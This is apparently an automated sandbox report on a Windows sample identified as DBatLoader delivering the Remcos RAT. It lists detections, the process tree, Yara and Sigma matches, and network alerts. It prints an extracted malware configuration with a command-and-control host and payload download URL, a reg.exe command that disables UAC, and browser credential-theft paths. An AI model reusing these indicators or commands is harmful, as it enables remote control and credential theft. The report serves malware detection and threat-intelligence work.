Windows Analysis Report
MeP66xi1AM.exe

Overview

General Information

Sample name: MeP66xi1AM.exe (renamed because original name is a hash value)
Original sample name: b9803b83ed42e8f63e73719cfffeff30ecfabeca676a3a04a087754e2608a1c5.exe
Analysis ID: 1576964
MD5: f8cdbdf8318c11c2e3e286195f067042
SHA1: af9c826e25d7d9242c5957cf753af46dcb45fd33
SHA256: b9803b83ed42e8f63e73719cfffeff30ecfabeca676a3a04a087754e2608a1c5
Tags: exe, user-JAMESWT_MHT

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
AI detected suspicious sample
Allocates many large memory chunks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Uses dynamic DNS services
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file name is different from the original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • MeP66xi1AM.exe (PID: 768 cmdline: "C:\Users\user\Desktop\MeP66xi1AM.exe" MD5: F8CDBDF8318C11C2E3E286195F067042)
    • cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 828 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Wnbcdrjt.PIF (PID: 4876 cmdline: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" MD5: F8CDBDF8318C11C2E3E286195F067042)
    • cmd.exe (PID: 3152 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 1540 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326"]}
{"Host:Port:Password": ["hafiznor3374.duckdns.org:4610:1", "127.0.0.1:4610:1"], "Assigned name": "FM NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-L3FHGJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source | Rule | Description | Author | Strings
MeP66xi1AM.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\Wnbcdrjt.PIF | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000003.2176891397.000000007EBA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x691e0:$a1: Remcos restarted by watchdog!
  • 0x69738:$a3: %02i:%02i:%02i:%03i
  • 0x69abd:$a4: * Remcos v
00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6320c:$str_b2: Executing file:
  • 0x64328:$str_b3: GetDirectListeningPort
  • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63e30:$str_b7: \update.vbs
  • 0x63234:$str_b9: Downloaded file:
  • 0x63220:$str_b10: Downloading file:
  • 0x632c4:$str_b12: Failed to upload file:
  • 0x642f0:$str_b13: StartForward
  • 0x64310:$str_b14: StopForward
  • 0x63dd8:$str_b15: fso.DeleteFile "
  • 0x63d6c:$str_b16: On Error Resume Next
  • 0x63e08:$str_b17: fso.DeleteFolder "
  • 0x632b4:$str_b18: Uploaded file:
  • 0x63274:$str_b19: Unable to delete:
  • 0x63da0:$str_b20: while fso.FileExists("
  • 0x63749:$str_c0: [Firefox StoredLogins not found]
00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
  • 0x63100:$s1: \Classes\mscfile\shell\open\command
  • 0x63160:$s1: \Classes\mscfile\shell\open\command
  • 0x63148:$s2: eventvwr.exe

Source | Rule | Description | Author | Strings
5.2.colorcpl.exe.4a80000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
5.2.colorcpl.exe.4a80000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x679e0:$a1: Remcos restarted by watchdog!
  • 0x67f38:$a3: %02i:%02i:%02i:%03i
  • 0x682bd:$a4: * Remcos v
5.2.colorcpl.exe.4a80000.0.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x61a0c:$str_b2: Executing file:
  • 0x62b28:$str_b3: GetDirectListeningPort
  • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x62630:$str_b7: \update.vbs
  • 0x61a34:$str_b9: Downloaded file:
  • 0x61a20:$str_b10: Downloading file:
  • 0x61ac4:$str_b12: Failed to upload file:
  • 0x62af0:$str_b13: StartForward
  • 0x62b10:$str_b14: StopForward
  • 0x625d8:$str_b15: fso.DeleteFile "
  • 0x6256c:$str_b16: On Error Resume Next
  • 0x62608:$str_b17: fso.DeleteFolder "
  • 0x61ab4:$str_b18: Uploaded file:
  • 0x61a74:$str_b19: Unable to delete:
  • 0x625a0:$str_b20: while fso.FileExists("
  • 0x61f49:$str_c0: [Firefox StoredLogins not found]
5.2.colorcpl.exe.4a80000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
  • 0x61900:$s1: \Classes\mscfile\shell\open\command
  • 0x61960:$s1: \Classes\mscfile\shell\open\command
  • 0x61948:$s2: eventvwr.exe
5.2.colorcpl.exe.68d0000.2.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\MeP66xi1AM.exe, ProcessId: 768, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , CommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Wnbcdrjt.PIF, NewProcessName: C:\Users\Public\Libraries\Wnbcdrjt.PIF, OriginalFileName: C:\Users\Public\Libraries\Wnbcdrjt.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , ProcessId: 4876, ProcessName: Wnbcdrjt.PIF
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\MeP66xi1AM.exe, ProcessId: 768, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Wnbcdrjt.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\MeP66xi1AM.exe, ProcessId: 768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wnbcdrjt
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , ParentImage: C:\Users\Public\Libraries\Wnbcdrjt.PIF, ParentProcessId: 4876, ParentProcessName: Wnbcdrjt.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 3152, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Wnbcdrjt.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\MeP66xi1AM.exe, ProcessId: 768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wnbcdrjt
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , CommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Wnbcdrjt.PIF, NewProcessName: C:\Users\Public\Libraries\Wnbcdrjt.PIF, OriginalFileName: C:\Users\Public\Libraries\Wnbcdrjt.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\Public\Libraries\Wnbcdrjt.PIF" , ProcessId: 4876, ProcessName: Wnbcdrjt.PIF

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 82 BA 33 88 9E ED 44 FA DE 11 38 01 B1 96 95 25 26 82 03 28 1F F7 9D 3E 09 99 6B 82 EE 45 B6 60 96 E8 CD B9 FB E7 62 EF E6 FA F1 BB 2B D3 80 19 B3 91 3A 2E B3 FC 49 A6 10 EE 5A BB 10 19 F3 77 D0 84 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-L3FHGJ\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T19:47:03.077202+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49708 | 23.237.50.106 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T19:47:18.570061+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:47:32.137548+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49742 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:47:45.660104+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49776 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:47:59.101670+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49808 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:48:12.620564+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:48:26.454189+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49874 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:48:40.016570+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49907 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:48:53.595546+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49939 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:49:07.185091+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49972 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:49:20.695746+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50004 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:49:34.539024+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50007 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:49:48.249996+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50009 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:50:01.813406+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50011 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:50:15.367649+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50013 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:50:28.914990+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50015 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:50:42.759117+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50017 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:50:56.293614+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50019 | 192.169.69.26 | 4610 | TCP
2024-12-17T19:51:09.722195+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50022 | 192.169.69.26 | 4610 | TCP

AV Detection

Source: hafiznor3374.duckdns.org | Avira URL Cloud: Label: malware
Source: MeP66xi1AM.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326"]}
Source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["hafiznor3374.duckdns.org:4610:1", "127.0.0.1:4610:1"], "Assigned name": "FM NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-L3FHGJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | ReversingLabs: Detection: 52%
Source: MeP66xi1AM.exe | ReversingLabs: Detection: 52%
Source: Yara match | File source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Joe Sandbox ML: detected
Source: MeP66xi1AM.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB15EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_04AB15EC
Source: colorcpl.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: MeP66xi1AM.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 23.237.50.106:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb | source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb | source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL | source: MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021AB1000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021A82000.00000004.00000020.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2310644496.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2310644496.0000000000798000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B358B4
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A887A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04A887A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_04A9A01B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_04A8B28E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04A8838E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_04A8AC78
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A868CD FindFirstFileW,FindNextFileW,5_2_04A868CD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A87848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_04A87848
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A97AAB FindFirstFileW,FindNextFileW,FindNextFileW,5_2_04A97AAB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_04A8AA71
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04ACBA59 FindFirstFileExA,5_2_04ACBA59
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A86D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_04A86D28

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49710 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49742 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49776 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49808 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49841 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49907 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49874 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49939 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49972 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50007 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50004 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50013 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50009 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50019 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50011 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50017 -> 192.169.69.26:4610
